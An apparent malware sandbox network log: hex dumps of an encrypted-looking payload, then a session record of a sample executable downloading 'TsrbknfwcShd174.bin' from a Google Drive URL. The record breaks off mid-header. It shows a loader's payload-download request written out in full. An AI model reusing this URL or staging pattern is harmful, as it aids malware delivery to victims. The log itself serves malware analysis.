                                                                                                                                                                                                2023-11-17 18:25:36 UTC230INData Raw: 5f 5c bd 37 1f 12 d6 91 37 e5 b1 0c 73 f0 13 ff cc 00 7a 2d 7b 39 c3 7b 6d f1 06 d0 8b 6c d8 d5 3a 02 06 8d 5b 8e 3b 0b 99 81 af 65 9b ce 1c e2 74 ff 1c b2 f9 b5 4c 19 e3 64 e5 ba dd df 6d bd 9c b9 6e ae db 51 8c 8b c8 9a 86 8a e1 f0 be d6 66 fa 23 f8 dd 7f 86 46 23 00 d2 48 a3 3b d3 a7 c3 bf ee 49 09 74 65 d0 58 5f be 7a ec e9 6c e1 30 fd ac 09 15 df 41 b4 51 ab 2a b0 91 72 60 f2 a1 e4 bb dc 0d 9e 11 14 c4 5e 98 5e 7c 50 6d 50 8a 70 07 f6 e0 94 96 9e db 4c a1 c1 e7 12 2d c4 20 0e f9 71 dc 88 73 85 47 27 de 0a 2a 67 84 0d 4a fc 53 b4 2c 55 0b dc e1 2a 63 87 3e 10 32 e8 9f de 1a 67 63 b1 cb 8e fe 22 4d a8 93 f7 73 01 38 b0 64 38 c2 14 a7 35 b9 3e 88 f0 54 44 fa 04 e6 ef b7 a1 3a e8 66 24 be 10 06 90 5d c4 24 18 5a 4a e8 40 7b f2 e2 2e ab 7c 6e 8b 7d 8b 44
                                                                                                                                                                                                Data Ascii: _\77sz-{9{ml:[;etLdmnQf#F#H;IteX_zl0AQ*r`^^|PmPpL- qsG'*gJS,U*c>2gc"Ms8d85>TD:f$]$ZJ@{.|n}D
                                                                                                                                                                                                2023-11-17 18:25:36 UTC232INData Raw: eb f4 47 f1 dc 0d 94 64 e5 16 49 e2 a0 34 91 39 5b 5b db d9 ce 40 ee dc 93 0c 5b de 8a 23 87 a7 b6 b4 b2 a5 7c b5 4b eb 57 ef 95 af 5a 20 c3 bf e7 1d 1c 8a 92 37 18 5f 1b f2 52 17 6b 22 38 28 27 f5 85 0e 66 7d 91 59 ff 61 e1 02 6d c0 d7 94 64 b5 f7 b0 2b 15 96 de 0d 0d b8 f6 a6 af 41 12 90 e6 42 01 3c f7 29 9c 8c 11 d7 54 51 bf 5e d9 43 12 13 60 da d3 7c 49 47 97 14 5a 3d 51 b0 e9 1e e0 62 3b cb 96 2f 27 50 a4 c2 58 9a 9a 0a cf 55 9b 0d 87 4e ee f0 8d cf 27 c8 f6 d0 ff b9 5b 80 7b 3a d9 fb 76 52 b6 ed dc 92 9c 07 dc 11 9f 9d 50 1a 3b 5a bc b4 88 0d 94 db 2f 27 f7 46 89 1d 9f 80 0c b8 2f 67 31 c4 fe 65 11 c3 94 1f 11 c0 1f 96 d2 bd c6 b5 4d 88 25 cd fa d5 b3 01 27 fb 38 3c 74 61 d5 36 d2 c9 8b 16 a3 81 62 39 68 82 94 d8 f3 54 56 27 78 f3 b2 8d 80 30 1e 37
                                                                                                                                                                                                Data Ascii: GdI49[[@[#|KWZ 7_Rk"8('f}Yamd+AB<)TQ^C`|IGZ=Qb;/'PXUN'[{:vRP;Z/'F/g1eM%'8<ta6b9hTV'x07
                                                                                                                                                                                                2023-11-17 18:25:36 UTC233INData Raw: eb e3 ec e3 d6 75 d1 b3 42 8a 4f 25 68 a3 e2 e5 49 55 5e 73 e3 82 d1 33 af 15 07 19 20 a8 21 6c 70 d1 0d 17 a9 60 b8 b9 20 59 82 d8 f2 ef 53 37 60 27 80 bf 3f 0c 88 32 cd b2 2a 23 e3 8f 1b 4d 3d 6b 43 6c 35 78 91 45 cb 15 48 98 00 0d 6a 3d 0d 8a 97 b3 35 4a 0b e1 0e 04 7b 8f 56 77 8a cd c5 f0 9d c8 2c 3d cd 54 41 1d bc 29 35 17 75 92 00 c9 6a 22 a3 0f 17 55 21 58 8f 0f b3 7b 60 9f 2f 45 17 59 f5 33 b3 3d 15 33 3a 2b 67 80 69 36 26 7f dd 56 f7 87 61 bc 50 81 43 fc 14 e8 03 81 13 18 73 f6 99 47 79 f6 c6 05 45 4a 30 e0 bc ec 8f 2a 07 26 32 40 c5 d1 95 d4 96 c9 3a 55 3a b3 f4 91 1e ea 04 4f c9 10 a4 93 29 a4 4d 38 39 13 09 64 10 29 a2 24 b2 9d 47 e0 99 5e a9 05 40 ab 7d 19 e5 38 0d 16 bd 7a a7 68 2b 1b 14 7b 48 c5 f8 08 b4 fe 16 00 9e 30 d0 9c 2d 2d 4a 75 bd
                                                                                                                                                                                                Data Ascii: uBO%hIU^s3 !lp` YS7`'?2*#M=kCl5xEHj=5J{Vw,=TA)5uj"U!X{`/EY3=3:+gi6&VaPCsGyEJ0*&2@:U:O)M89d)$G^@}8zh+{H0--Ju
                                                                                                                                                                                                2023-11-17 18:25:36 UTC234INData Raw: ab 4c 42 91 b7 63 78 31 21 ca 9c d9 5b 41 51 3f 0e 5f 48 a5 40 ca 52 9b d6 49 39 ca 9c a1 f8 23 41 ae bb 14 18 dc 93 d9 c2 6e 3b 04 b7 f2 34 b5 60 cb 52 a9 d6 8a fc d3 57 2b cd a3 8a 55 84 f0 f7 eb af 26 4a 94 b3 dd 7b d3 87 fc 1b d6 17 11 b9 a6 a8 57 5d be 2f 4b 24 2c 4d cd 80 5e 63 0c 19 ba 34 11 4f d6 93 5d 3c b1 3a f9 81 3c 3b f9 aa d3 78 1a 93 a7 b7 04 56 b3 a5 80 87 1a 94 24 06 c4 c3 04 19 31 a2 e2 b2 64 e7 08 97 4b 14 f8 e2 77 97 a9 d7 c7 49 90 65 e4 f8 99 b8 c9 aa da 01 81 78 27 c9 d5 ca a1 e6 ad 8a d1 35 26 81 59 ec 07 af d0 32 f6 35 3a 95 8a ef a3 97 63 8e d4 b4 4e 63 4b 71 f0 1e 68 c9 bb 49 5c 33 9d ef bf 90 b4 69 88 ff 6e 75 d7 bc 2e 89 30 a1 71 36 96 ab 80 f8 45 7a c1 8f 82 f7 bb 3b 47 81 df ff db 73 ef 36 36 4c 8e 70 a2 76 9d 67 49 f1 8f 0a
                                                                                                                                                                                                Data Ascii: LBcx1![AQ?_H@RI9#An;4`RW+U&J{W]/K$,M^c4O]<:<;xV$1dKwIex'5&Y25:cNcKqhI\3inu.0q6Ez;Gs66LpvgI
                                                                                                                                                                                                2023-11-17 18:25:36 UTC235INData Raw: 8b 19 2b 15 e2 9b 05 19 95 7c 7c 3b 3b a9 72 77 aa d6 d3 e2 90 0e 59 97 8f 3f 61 a1 ed 51 96 61 1d dd da ec d8 18 83 d1 65 9b dc 63 0b 41 ff eb 2e ba 1e c1 89 8b da 49 57 19 72 9e 7c 2e f2 ea 37 a7 5a 59 d7 e0 f4 bb f9 0e 2f 41 3b 90 6b 5d f5 af 26 e1 55 67 9d 95 d0 b4 14 b1 02 02 ec d6 7d 08 1e 52 49 c2 b2 b0 40 78 41 ad 90 ce 29 5c 9c 28 91 3f 88 96 d5 e5 1a ba b1 e2 27 20 7d b1 e5 50 e8 c4 4a 96 cd 6e 49 9e f5 1e 1b 22 e7 cb 9c 3d ee 88 44 a0 31 34 ba 8d 08 21 88 82 e7 12 ed ce 0d 20 10 67 6a 1f b6 29 10 df a4 dd 3d 12 6f f6 e7 88 07 47 2e dd be 4a f5 d1 f9 65 fa a1 f8 b3 e8 e3 8f 30 20 b0 ad a1 70 6a 54 49 53 fc 37 32 37 9d 6e ea ca b5 ef 5a 0a 2e 3e 01 48 d8 33 54 10 58 29 f1 82 8e 97 f9 86 7b b8 f4 9d ee 2e 02 d8 bc 8a de 78 cf 1c ae 9a 75 3d d1 81
                                                                                                                                                                                                Data Ascii: +||;;rwY?aQaecA.IWr|.7ZY/A;k]&Ug}RI@xA)\(?' }PJnI"=D14! gj)=oG.Je0 pjTIS727nZ.>H3TX){.xu=
                                                                                                                                                                                                2023-11-17 18:25:36 UTC237INData Raw: f6 df b6 a1 22 18 03 fe f9 0b d5 cf 49 14 73 bc ab 7c e4 91 0e a5 8b 1c 57 88 6b bc 05 93 e4 cf 30 af d6 9d 8a 5d 77 30 a3 9f 45 74 48 a9 bb 1c b6 4f 39 d3 a8 00 7c c6 ac dc 6d ca 8b 33 1c 8b 03 19 49 59 d1 94 5c 4f 86 14 c7 74 67 4d 7f 86 09 74 52 eb 9c ba 4c 87 f2 da c0 d0 e8 6e 2e db 13 1e 68 df 53 bd d7 44 a0 40 8b ca fe cd c9 5e 13 34 f9 da 82 03 19 6b fe 0e 41 47 8b 67 9f e5 98 38 14 00 5d cf b0 d0 89 74 4c 80 3d c2 2f 89 e5 72 87 10 85 99 51 91 db f4 de 15 8a 5d ea c1 63 cb 2e 60 27 94 a6 fc 7d 07 5a 77 12 1e b8 9e 50 14 da 52 95 02 92 d6 a7 ff bc 78 5f de 8a 22 33 a5 9a 03 f8 dd 95 bb f5 e0 57 c4 42 e3 29 b0 df 8f b5 09 fd ef 4e c9 cb 3b cd 44 8a 13 5c 18 ac 49 24 10 8f 73 9d 8d 4b 7c 9e 16 f3 04 dd 7c c5 1d 24 95 f2 c1 33 0f f1 cc 7d 58 a1 4c c3
                                                                                                                                                                                                Data Ascii: "Is|Wk0]w0EtHO9|m3IY\OtgMtRLn.hSD@^4kAGg8]tL=/rQ]c.`'}ZwPRx_"3WB)N;D\I$sK||$3}XL
                                                                                                                                                                                                2023-11-17 18:25:36 UTC238INData Raw: fa 82 79 3e f5 dd f2 3c 08 8f 65 05 28 aa db dc c7 36 0a 53 d6 1e 5a 03 bf 71 3c 8d 6c 68 8b e6 3c 46 bd fc 10 13 9e e6 9c bc 1a a9 57 ea c4 87 43 8e 37 d8 ed 6b 60 16 86 30 0a b9 a6 47 b5 90 58 56 a8 6f d8 14 5a 08 b1 48 3a a9 40 49 d2 78 e7 2d 49 bc 20 15 62 c9 d7 61 4a 98 8d 96 2c 54 73 e6 c8 3b 55 af d9 94 9d 79 8e 88 2a 3a 77 00 1d 69 2e 22 b5 61 22 fc 80 5c 15 2e ee a0 4d 4c 90 95 a6 64 46 84 ab c6 d3 01 23 ff 20 5e 18 58 5b 31 bf 90 71 e6 c2 16 81 af 34 9a 97 ee ae 26 b5 40 75 37 80 3a 0a 12 e9 4e b9 dc ff ff 4b f4 52 4d b9 51 6d b4 51 23 46 3f fc 0c 93 7f 8f 90 76 48 b5 61 88 b6 46 70 63 50 ca a2 16 bf a8 8b 95 f4 2c bc 25 10 1d 9c 8b 56 29 cf c9 45 38 ee 86 28 81 79 69 41 8f f8 02 d2 b7 31 1f ec f3 26 70 d1 6c b0 53 64 f1 06 2a ff 02 2d 68 81 d0
                                                                                                                                                                                                Data Ascii: y><e(6SZq<lh<FWC7k`0GXVoZH:@Ix-I baJ,Ts;Uy*:wi."a"\.MLdF# ^X[1q4&@u7:NKRMQmQ#F?vHaFpcP,%V)E8(yiA1&plSd*-h
                                                                                                                                                                                                2023-11-17 18:25:36 UTC239INData Raw: 6b 8a 0e c5 c9 4c 71 20 dc 52 0e d5 38 88 e0 65 bc 30 a3 f7 b9 6c ea 3c 37 7b 02 49 c4 78 83 0c 5f 7b a6 6a 4e ad 33 be 62 1c d5 70 a4 7a e3 cd c2 66 d6 43 4e 50 fb bb 77 5e 80 54 be 8a 25 99 e1 96 22 d3 d4 9f 13 fd 27 56 b8 dc ed 40 82 21 cb 68 7a 70 66 b0 7a 14 24 68 d7 57 06 fc 71 cd 13 9c 18 30 7c c3 46 d8 5a 06 63 24 0c 82 bd a3 b0 8c c6 12 f4 35 b0 30 46 f2 36 97 3c 83 29 86 b7 f4 9c 1c f3 08 30 48 a3 32 7f 86 ee 7c d0 05 c6 c2 6c a2 e9 83 fd 3c a7 4d c2 81 1f b5 b6 6b bc 57 d8 8e e7 f5 96 42 e3 11 e2 69 58 21 7b 75 70 59 0f e0 b5 8e 85 13 c6 3a 0a b7 f1 4e 49 b0 d9 8b 78 5c 54 77 ed 70 df f4 85 ac 3d 69 bf ab 95 e8 2b 15 24 bf 0b 0d 90 1f eb bc 3e ac 33 3e 2a 75 61 89 68 b8 55 df 50 66 28 03 ac 6e 02 91 00 f3 ea ec 76 a8 df e7 fa 14 69 40 1d a3 99
                                                                                                                                                                                                Data Ascii: kLq R8e0l<7{Ix_{jN3bpzfCNPw^T%"'V@!hzpfz$hWq0|FZc$50F6<)0H2|l<MkWBiX!{upY:NIx\Twp=i+$>3>*uahUPf(nvi@
                                                                                                                                                                                                2023-11-17 18:25:36 UTC240INData Raw: da d8 ad 62 c3 f3 83 e7 c4 16 e4 ab a5 18 08 9a bf b5 a3 25 60 6d 4a 79 65 c9 1b 57 8f f1 a6 10 ba f6 59 09 35 f9 49 c2 e8 55 a1 4c 1a 83 a3 50 f1 c1 c3 17 59 50 dc c5 de a1 38 40 3b 52 3f f4 98 e6 4f 92 e4 24 8a 8d 7f e3 ef a6 a0 3c ec d7 66 bd 62 73 97 62 26 78 f6 25 bb 4a 0b 6e 9e b0 8b 4c 4d 3f b0 b4 ed e2 b3 29 2f 1d 6a 7f b3 79 43 73 ac 5e b1 a6 26 37 79 09 55 a4 fb ea 2c 72 d5 f2 c3 3e cf 79 5c 8c 1f 0f dc 56 a6 26 47 5d 5d c3 12 57 4d e5 ad e9 72 0d 84 fa f7 36 49 79 9b ee eb cf b7 31 41 2f 90 f7 ac bc 1c 38 f0 09 2a d9 d5 96 57 30 a6 06 1d 29 fd c3 9a 0e 1f b8 66 5a ba c5 d0 ce ba bb bd 39 f6 87 cd 4b 52 8b c9 dc 13 61 e1 9b 1e c1 10 ad 4d 61 3e 92 ac 74 bb c7 34 a7 0f 46 ff 0c ea 3b 52 c8 3f b0 98 cf a1 2c a8 86 2e f5 ec 73 a2 2b 56 5e 6f 1f bf
                                                                                                                                                                                                Data Ascii: b%`mJyeWY5IULPYP8@;R?O$<fbsb&x%JnLM?)/jyCs^&7yU,r>y\V&G]]WMr6Iy1A/8*W0)fZ9KRaMa>t4F;R?,.s+V^o
                                                                                                                                                                                                2023-11-17 18:25:36 UTC241INData Raw: 69 92 d4 34 c8 30 52 45 d5 8b d9 45 17 9b d6 0e 9b ff b8 ca dd f2 a5 81 70 07 b6 3d 49 a8 ed 24 c9 d8 f7 79 8b 49 73 fc 1a 3b 52 f3 d9 a7 5d 62 c9 54 7c 27 2b 78 e6 97 6c 7b 56 7c 50 23 a8 1f 42 1b 9c 42 92 c5 43 d5 80 94 86 73 48 e1 aa c3 54 01 02 3a 91 be 27 2f 11 0a 22 b8 b6 cb 35 52 d1 14 bf c7 d9 ff 8e fc 43 88 d6 0d
                                                                                                                                                                                                Data Ascii: i40REEp=I$yIs;R]bT|'+xl{V|P#BBCsHT:'/"5RC
                                                                                                                                                                                                2023-11-17 18:25:36 UTC242INData Raw: a5 fd f5 73 c8 0f c2 37 5a d4 8c 7d 2e ae 14 04 02 08 99 9f e9 c2 38 62 52 5f 22 b8 24 b5 c9 5b b3 f5 42 1a 09 3a 37 07 0a ef a0 42 88 e8 93 b4 fc 1d 7a 55 1e fd d1 8a 5f 16 d8 21 3f e8 68 e2 dd 89 0f 3c 4b b0 4a c3 95 ad 44 9e 56 b8 14 8e 29 a8 1b 6f 46 e8 3a b2 bb b6 24 dc 25 db 52 f2 fa 1d 72 e3 22 2c 1f 49 6b 75 b4 aa 9b 33 df 68 a5 88 cb 5d 4c aa 73 81 d7 3b b8 b5 3c f0 dd e0 df 3b e1 a7 45 23 96 3d 17 26 9c 88 79 4f 0e 46 cf 6f d8 62 c8 7c 9e 25 10 23 1f 62 d5 a0 1d 40 42 fa f6 a6 50 74 a6 8c 95 c0 79 76 9d 3a 31 c9 fa 29 9b 09 73 90 a1 c7 a2 5b 28 43 65 14 f2 62 04 79 e3 9f 37 a7 34 58 ca cb 7f 02 90 ee 6e 05 e4 c3 38 8c df b9 22 07 9d e2 4f a8 d8 2e 8a 98 04 fd c4 d4 44 30 fa e2 45 48 c7 19 15 89 52 cd 50 3a 61 5f 66 96 84 d6 10 38 52 4a ae 76 74
                                                                                                                                                                                                Data Ascii: s7Z}.8bR_"$[B:7BzU_!?h<KJDV)oF:$%Rr",Iku3h]Ls;<;E#=&yOFob|%#b@BPtyv:1)s[(Ceby74Xn8"O.D0EHRP:a_f8RJvt
                                                                                                                                                                                                2023-11-17 18:25:36 UTC243INData Raw: e3 3c 6a 74 82 13 69 e8 bc fb 6f 8d 78 8d b0 80 eb cd ac 9a d3 df 28 ff 20 48 75 6d f0 a3 50 29 af 6f 0a 52 06 52 b9 33 2f c4 f5 f6 71 24 0e 02 2d f6 18 11 75 f3 a5 33 26 44 48 70 5e 8b 00 62 36 60 28 bd 53 da 3b f8 c0 e5 06 0c d3 f6 d1 a1 f9 59 f6 29 cf 62 34 67 42 2d 4b c2 17 ad 8e e3 11 69 3d 9c 93 a2 c9 07 55 f2 59 e6 81 18 e2 b8 e6 a0 fa 64 0c 3c 56 9a 9c 82 91 f4 e1 5d 12 d7 1b d5 5d 83 7c 91 65 a4 38 ff 5b d6 df 42 64 7b f1 bb 50 bc bf 7a 6e a2 07 bc cd 01 0f 51 b1 84 e3 e9 e7 fc ec 07 b1 49 0d 49 41 50 73 48 89 de 98 38 07 3a 50 96 4d ba f8 1d da e8 71 26 42 ef f3 16 8e 3d b0 c2 9c 8b 5a 77 5c 89 55 50 33 01 47 2d 42 62 68 0d f9 ec e5 49 6c cc 6d df 8f e5 a7 af c6 24 6e f7 dc b9 60 0d 51 60 7a f8 a5 8e e5 e5 3f 66 76 4d 6e c5 c9 ac 94 42 c3 fa 9f
                                                                                                                                                                                                Data Ascii: <jtiox( HumP)oRR3/q$-u3&DHp^b6`(S;Y)b4gB-Ki=UYd<V]]|e8[Bd{PznQIIAPsH8:PMq&B=Zw\UP3G-BbhIlm$n`Q`z?fvMnB
                                                                                                                                                                                                2023-11-17 18:25:36 UTC244INData Raw: 21 84 20 b0 4f dc 37 14 36 78 5b 4a ef 18 fa cb ab ac 3d 84 ad 63 38 be ca ed a5 ef 4e a6 62 b7 ca 8a 1a 9f 28 dd e7 9e ef 7d 21 f4 1c d2 6e d5 bf ea b6 d3 12 3b 6a 4f 75 14 1c b4 eb c4 04 d0 79 20 0d 19 43 1c 78 e1 bb aa 06 9d 3f e1 16 42 8d e8 b2 6b a0 04 85 2b d0 57 0b 81 43 f2 c2 11 25 9f 7d 53 57 0b 87 58 02 b0 37 36 ff 51 49 94 ba ae 50 3e da 79 f2 c5 13 5e 1e f7 81 6c 72 fc c7 3c 49 80 63 79 48 63 dc a4 db 89 f5 e4 e7 18 0b 15 88 4e 03 3e c8 5d 06 47 2e a6 d9 93 39 93 66 10 66 30 e9 16 b7 f0 7d 9b 89 8d 08 a8 6b da fc 4e eb fa d0 d3 4e 1a e9 e0 73 bc 52 06 37 b5 8e 3b 1d b5 40 8f 7d 20 48 ff 8b 39 d5 0e 16 69 0b b4 35 4e 4b de ae 63 c4 86 2b f7 a2 23 48 b1 87 27 c7 48 03 b4 23 ac a3 f9 e0 81 41 67 ed 6c 52 6c 58 5d d8 80 49 15 a6 11 4e cf 74 7c 47
                                                                                                                                                                                                Data Ascii: ! O76x[J=c8Nb(}!n;jOuy Cx?Bk+WC%}SWX76QIP>y^lr<IcyHcN>]G.9ff0}kNNsR7;@} H9i5NKc+#H'H#AglRlX]INt|G
                                                                                                                                                                                                2023-11-17 18:25:36 UTC245INData Raw: 87 37 3b 1b fd ec d1 8e c1 04 d6 97 ac ef ac c1 a4 85 d3 4b fc e5 77 2a c7 13 66 80 db 2b c4 ae fd 09 db d9 f8 41 61 2b a9 a4 8e c6 52 9a 43 11 f6 be f4 ed cf 9b 94 a7 6e 6e 60 d2 9e a5 d6 a1 e4 bf 85 cc 65 fe 1f 47 4f 8f 40 6d f1 95 84 2f 54 78 e4 07 d1 d2 0b 7d 3b 88 38 da ce 3a 73 8b 2c d5 32 84 a2 05 1d 7a f9 f4 2c 2a a6 48 34 ae 66 22 c9 ee 05 f3 da 12 0e c3 79 c4 c6 d9 da 8b cc 38 39 2c df 44 a3 ea 35 29 ec 5a 33 a9 e0 b2 18 ab 3f 68 0e 11 8d 6e 3c 4e fc 94 e3 b6 e6 6a fe c5 f2 89 64 9e 72 11 a0 5d d8 0e 6d f4 18 94 a3 07 b3 ba bb e0 bf 1d 36 fc c3 2e 66 6e a9 a8 d4 c8 fb 47 34 5b db 00 5c 45 48 7e 08 1f 65 7e 70 dc 30 45 78 35 9b 3a 33 91 c3 40 83 64 f7 5f 30 fe ec 70 10 74 44 cc a3 73 44 ac 75 9c bd 05 1f 56 54 b6 12 5f c0 34 ca ef 30 34 58 09 f6
                                                                                                                                                                                                Data Ascii: 7;Kw*f+Aa+RCnn`eGO@m/Tx};8:s,2z,*H4f"y89,D5)Z3?hn<Njdr]m6.fnG4[\EH~e~p0Ex5:3@d_0ptDsDuVT_404X
                                                                                                                                                                                                2023-11-17 18:25:36 UTC246INData Raw: 3c 98 1f 32 cf fe 1a d6 d2 c6 ac e4 06 b4 22 28 0b f1 1c c8 bf 41 ff 3f 34 b4 e0 3d 20 f1 02 ac 9e 8d dc ad 09 14 5c f1 20 02 29 ed 71 7a 5f bd c8 a2 e0 69 8e 35 8c 4f fc a7 8c 4f d6 c9 d0 7e 8b 60 26 fb ed a1 20 e4 78 f9 3f 04 2e 98 fa 4d 4f 74 7a d7 56 89 65 9c 61 4d db c7 7a dc 94 6a 6f b5 de 3b bb eb b4 b8 ea 1d 6f 0b da a4 51 3c 76 23 2e 6a 52 6b 55 69 5a 3a 7e be 52 c5 5d e6 cb e8 f2 d5 2d b2 11 51 9b 3c a8 7b 94 2b 19 85 b2 5e 4c 21 e9 bb 71 4d 0f 42 cb a4 25 0d b5 ca 29 36 e9 d6 dd 7c 2a a3 3a 38 49 98 fc 8a ae 04 68 ba ce 89 e5 a0 86 a4 38 27 4a 39 05 cf 5a be e0 08 e8 42 22 1d 83 4b c2 4f 21 4f 98 dc 13 62 55 02 fe 23 75 12 c4 98 fe 4d af 28 2c 9b 58 65 b2 88 55 d3 84 23 37 66 c2 c4 b5 a6 6a da 17 37 c0 72 cd f5 49 de 10 c9 32 f7 87 ed 76 28 0f
                                                                                                                                                                                                Data Ascii: <2"(A?4= \ )qz_i5OO~`& x?.MOtzVeaMzjo;oQ<v#.jRkUiZ:~R]-Q<{+^L!qMB%)6|*:8Ih8'J9ZB"KO!ObU#uM(,XeU#7fj7rI2v(
                                                                                                                                                                                                2023-11-17 18:25:36 UTC248INData Raw: 5b fb 62 f5 76 05 7f 6b dc d0 53 84 54 b0 f2 7e 16 24 92 fc 8c 79 a1 de 01 ab b8 9c 31 15 aa 1e 36 e5 57 ef 6a a3 91 d6 cb c5 a4 d5 ad c0 1d a0 ab 13 94 c6 04 60 f1 d0 da 8e 5b 39 2c 40 8e f5 2f da 9d 27 f6 c1 89 91 ad 3b 32 22 b4 6a 70 ca 12 c8 0c a6 1e c3 7a ac 1b f1 2e e0 8f 39 24 0a ea 0a f6 76 e8 2b 09 af f4 74 7b 35 44 38 7e 39 dc 76 d5 64 ec 90 f0 bf 4e 1d ea a1 24 7d d9 5d 04 1e 3f 03 86 02 d6 18 d5 68 06 5d 29 a1 ca e5 ce a4 bb b3 6e 34 1d 19 c6 c5 ee 0d 92 c0 83 2d 95 38 2f 04 07 e6 95 88 d6 33 5f da 80 36 21 27 a7 ef 90 d3 05 c8 a6 43 9e a9 90 95 1a 53 53 f2 13 49 ed 43 8e b3 9c c2 1f 79 c4 dc cd 1b 48 c0 54 97 67 5e 08 64 48 b3 cc b4 3a 78 df 6d d2 bf 8b ba 0f 2e cb 12 d2 16 bf 53 f4 e8 de 09 56 39 0c 7f a0 41 0b 43 89 74 90 57 a6 83 37 b5 23
                                                                                                                                                                                                Data Ascii: [bvkST~$y16Wj`[9,@/';2"jpz.9$v+t{5D8~9vdN$}]?h])n4-8/3_6!'CSSICyHTg^dH:xm.SV9ACtW7#
                                                                                                                                                                                                2023-11-17 18:25:36 UTC249INData Raw: dd 7a fa 9b 69 82 be db 74 ff ff d1 06 8c e1 f8 5c 8e bc 55 3b 71 73 03 e8 fb 8d a4 42 a5 bc 55 e0 b7 8e 97 0d 4d a0 ff a7 10 1c 8a 49 99 67 3a 65 c1 75 82 41 74 9d 49 d0 81 5e 78 2e 69 b5 80 a3 ad 91 b6 ff 82 e8 2c 45 a4 df dc a4 a0 fd ef 06 8c 94 34 8f 64 a0 1b 17 2e 6c c3 7e 05 80 4b aa a0 34 f3 f3 a1 51 b9 14 9e 11 3e b3 3c b8 78 8f 1a 97 d0 c3 52 fd 33 10 b4 2c 18 26 74 d6 46 fb 03 f2 7c 04 a4 45 5a 26 b3 11 1a f9 a4 d8 4e d8 58 f6 f2 7f ff a7 1c 2c 03 d4 e0 83 fe 1a 6a a3 8e f6 c5 81 f9 89 92 ac 10 bc 69 60 5a 1a ea 59 ef 20 02 ff cd 4b a6 c6 0a c5 0a dd a4 1b d6 cc 78 12 a0 e1 4d 2c 58 4a a0 7b 4e ef 29 f9 f8 8e 22 ce c6 fa ca 5e 6e 46 34 7c 15 0d c3 3d 5f a1 1c 4c 54 28 d8 31 33 62 a9 ed 58 5f c7 4d 00 0a 6b ae ab 4d 08 5f 5d fc 23 6d 0f 3c 8e ac
                                                                                                                                                                                                Data Ascii: zit\U;qsBUMIg:euAtI^x.i,E4d.l~K4Q><xR3,&tF|EZ&NX,ji`ZY KxM,XJ{N)"^nF4|=_LT(13bX_MkM_]#m<
                                                                                                                                                                                                2023-11-17 18:25:36 UTC250INData Raw: ab 73 f6 85 d6 4a d7 6d 18 7e b0 2c 8a 16 9c 2c b7 6f e5 bb 85 65 fc ea 85 b3 97 e6 15 21 a9 70 58 0e c1 a2 52 fe 7f 8b 0c 3f 18 48 80 e7 1d bc a5 5f 68 a9 8d 45 91 69 c0 f2 31 ab 14 33 ec
                                                                                                                                                                                                Data Ascii: sJm~,,oe!pXR?H_hEi13


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1192.168.11.2050128142.250.81.225443C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                2023-11-17 18:25:35 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekdjt93c9f8d0n714cnia796q3u/1700245500000/07385957382368565097/*/15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5?e=download&uuid=7c0286c5-d7f7-44f9-bef7-ac2965bbc2b0 HTTP/1.1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Host: doc-08-18-docs.googleusercontent.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2023-11-17 18:25:36 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                                X-GUploader-UploadID: ABPtcPr2flMhgk32qsu5Dc3FZ-6p_Sb2hWiv66rt7oHlcN1zOgYRGGFJPv5kgcAC_0j3HBGQE_BEPZ64U4-l_J0IdvuAIQ
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Content-Disposition: attachment; filename="TsrbknfwcShd174.bin"; filename*=UTF-8''TsrbknfwcShd174.bin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, 